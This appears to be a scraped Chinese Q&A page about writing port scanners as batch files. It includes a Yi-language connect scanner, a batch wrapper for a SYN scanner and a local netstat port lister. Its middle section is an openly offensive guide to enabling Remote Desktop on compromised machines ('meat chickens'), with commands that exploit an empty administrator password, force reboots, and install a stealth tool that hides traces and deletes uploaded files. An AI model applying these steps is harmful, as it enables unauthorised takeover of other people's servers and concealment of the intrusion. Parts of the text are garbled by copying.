windows端口扫描命令_端口扫描bat脚本

怎么用BAT文件做端口扫描器

首先，给你更正一下，估计是你看了别人的教程或者软件，让你以为BAT可以扫端口，严格意义上说批处理文件BAT是不能真正意义上实现扫端口功能，即使有也是利用TELNET。而且是单线程。是没任何意义的。你看到的我估计是S扫描器，然后别人做成一个批处理，比如流行的扫135，1433，3389或者其他溢出都喜欢用S扫描器，因为它速度一流，而且是命令下操作适合做成BAT文件批量处理。而输出扫描结果这个比较简单，就是写几行批处理来提取S扫描器生成的结果Result.txt文件，然后输出到5.txt中。就这么简单。这些代码网上有现成的，如果你有需要可以给我留言，适当的给你分享分享！

关于易语言bat命令使用

所谓 端口扫描 其实就是用一个客户去连接IP-PORT,如果可以连接上,就返回真,否则返回假~

.版本 2

.程序集变量 IP, 文本型, , "0"

.程序集变量 cnt, 整数型

.子程序 _按钮1_被单击, , , 处理IP

IP ＝ 分割文本 (编辑框1.内容, #换行符, )

cnt ＝ 取数组下标 (IP, )

.子程序 _按钮2_被单击, , , 扫描

SCAN (6666)

.子程序 _按钮3_被单击, , , 扫描

SCAN (6668)

.子程序 SCAN

.参数 port, 整数型

.局部变量 tmp, 整数型

.计次循环首 (cnt, tmp)

.如果真 (客户1.连接 (IP [tmp], port))

编辑框2.加入文本 (IP [tmp], #换行符)

.如果真结束

处理事件 ()

.计次循环尾 ()

不需要BAT....麻烦~

求个端口扫描器 bat格式的

setlocal

cls

color A

title 6666端口扫描【服务器SYN1000线程】

echo ======================================================

echo 6666端口扫描【服务器SYN1000线程】

echo .

echo .

echo ======================================================

del result.txt

del s.txt

for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s syn %%i %%j 6666 1000 /save

for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%is1.txt

for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%is2.txt

for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i:6666s.txt

del s1.txt

del s2.txt

del Result.txt

本人珍藏自己下个S.exe配置文件是ip.txt端口自己改！

如何在BAT中开启这些端口

打开3389端口的5种 ***

怎么样开3389端口，这里我把他们总结一下，很全面,希望对你有用:

1，打开记事本，编辑内容如下：

echo [Components] c:\sql

echo TSEnable = on c:\sql

sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

编辑好后存为BAT文件，上传至肉鸡，执行。这里值得注意的是要确定winnt是否在c盘，如果在其他盘则需要改动。

2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05

使用 *** ：

在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如：

c:\cscript ROTS.vbs 目标IP 用户名 密码 [服务端口] [自动重起选项]

服务端口： 设置终端服务的服务端口。默认是3389。

自动重起选项： 使用/r表示安装完成后自动重起目标使设置生效。

使用/fr表示强制重起目标。（如果/r不行，可以试试这个）

使用此参数时，端口设置不能忽略。

比如扫描到了一个有NT弱口令的服务器，IP地址是222.222.222.222，管理员帐户是administrator，密码为空

运行CMD（2000下的DOS），我们给它开终端！

命令如下！

cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr

上面的命令应该可以理解吧？cscript reg.vbe这是命令，后面的是IP，然后是管理员帐户，接这是密码，因为222.222.222.222 这台服务器的管理员密码是空的，那就用双引号表示为空，再后面是端口，你可以任意设置终端的端口，/fr是重启命令（强制重启，一般我都用这个，你也可以/r，这是普通重启）

脚本会判断目标系统类型，如果不是server及以上版本，就会提示你是否要取消。

因为pro版不能安装终端服务。

如果你确信脚本判断错误，就继续安装好了。

如果要对本地使用，IP地址为127.0.0.1或者一个点（用.表示），用户名和密码都为空（用""表示）。

脚本访问的目标的135端口，如果目标135端口未开放，或者WMI服务关闭，那么脚本就没用了。

3，下载3389自动安装程序-djshao正式版5.0

说明：

解压djshao5.0.zip,用你的随便什么 *** 把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下，然后进入c:\winnt\temp目录执行djxyxs.exe解压缩文件，然后再执行解压缩出来的azzd.exe文件，等一会肉鸡会自动重启！重启后会出现终端服务！

特点：1、不用修改注册表的安装路径，注册表会自动修改，安装完后会自动恢复到原来的安装路径，2、在后台安静模式运行，就算肉鸡旁有人也没有关系！3、在添加和删除中看不出终端服务被安装的痕迹，也就是启动终端前不会打钩，4、不会在肉鸡上留下你的上传文件，在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件！5、不管肉鸡的winnt装在什么盘上都无所谓！6、安装完终端后会删除在管理工具中的终端快捷图标！7、在没有安装终端前，终端服务是被禁止的！安装终端后，终端服务被改为自动！但是如果在安装前终端服务是手动！安装后就可能还是手动！等重启后就不会打开服务！所以在软件中加了sc指令，等安装完后，不管终端服务是禁止还是手动还是自动，全部改为自动。8、自动检测肉鸡是不是服务器版，如果不是删除原文件，不执行安装，如果是服务器版就执行安装！9、支持中日韩繁四个版本的win2000服务器版！

5，下载DameWare NT Utilities 3.66.0.0 注册版

安装注册完毕后输入对方IP用户名密码，等待出现是否安装的对话框点是。

复制启动后出现对方桌面。

在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除windows组件，找到终端服务，点际进入后在启动终端服务上打上勾。确定自动提示重起，重起后OK .

怎么 *** 一个BAT的端口扫描器

@echo off

setlocal enabledelayedexpansion

title 端口扫描器　by 风旋碧浪

color 4fMODE con: COLS=50 LINES=12

echo.echo 开始扫描，需要时间，请稍候……

(echo.echo 端口号 进程名称

echo.echo TCP协议: )端口查看.txt

echo.echo 正在扫描TCP协议……

for /f "skip=4 tokens=2,5" %%a in ('netstat -ano -p TCP') do (

for /f "tokens=2 delims=:" %%A in ("%%a") do set TCP端口=%%A

for /f "skip=2 delims=, tokens=1" %%A in ('tasklist /fi "PID eq %%b" /FO CSV') do set TCP进程=%%~A

echo !TCP端口! !TCP进程!端口查看.txt

)

echo UDP协议: 端口查看.txt

echo.echo 正在扫描UDP协议……

for /f "skip=4 tokens=2,4" %%a in ('netstat -ano -p UDP') do (

for /f "tokens=2 delims=:" %%A in ("%%a") do set UDP端口=%%A

for /f "skip=2 delims=, tokens=1" %%A in ('tasklist /fi "PID eq %%b" /FO CSV') do set UDP进程=%%~A

echo !UDP端口! !UDP进程!端口查看.txt

)

echo.echo.echo 扫描结束！请查看《端口查看.txt》文件！

pausenul